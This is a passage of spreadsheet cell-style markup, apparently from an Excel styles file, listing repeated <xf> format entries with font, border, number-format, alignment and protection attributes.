    <xf numFmtId="176" fontId="37" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="10" xfId="69" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="5" xfId="69" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="75" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="43" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="43" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="76" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="184" fontId="43" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="11" xfId="57" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="2" xfId="69" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="2" xfId="69" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="17" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="10" xfId="69" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="10" xfId="69" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="17" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="64" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="184" fontId="64" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="30" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="64" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="184" fontId="46" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="184" fontId="74" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="184" fontId="43" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="181" fontId="18" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="181" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="181" fontId="17" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="2" xfId="80" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="2" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="0" borderId="11" xfId="39" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="2" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="14" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="29" fillId="0" borderId="2" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="29" fillId="0" borderId="15" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="0" borderId="9" xfId="39" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="0" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="29" fillId="0" borderId="10" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="29" fillId="0" borderId="8" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="0" borderId="7" xfId="39" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="5" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="26" fillId="0" borderId="5" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="26" fillId="0" borderId="6" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="43" fontId="77" fillId="0" borderId="0" xfId="9" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="43" fontId="28" fillId="0" borderId="2" xfId="9" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="28" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="25" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="25" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="43" fontId="64" fillId="0" borderId="0" xfId="9" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="28" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="25" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="25" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="78" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="79" fillId="0" borderId="0" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="0" borderId="0" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="0" borderId="0" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="182" fontId="57" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="57" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="182" fontId="17" fillId="0" borderId="17" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="18" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="17" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="17" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="17" fillId="0" borderId="6" xfId="0" applyNumberFormat="1"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5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="80" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="81" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="65" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="43" fontId="82" fillId="0" borderId="0" xfId="9" applyFont="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="75" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="75" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="83" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="83" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="43" fontId="64" fillId="0" borderId="0" xfId="9" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="justify"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="justify"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="84" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="182" fontId="85" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="59" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="86" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="59" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="86" fillId="0" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="87" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="87" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="87" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
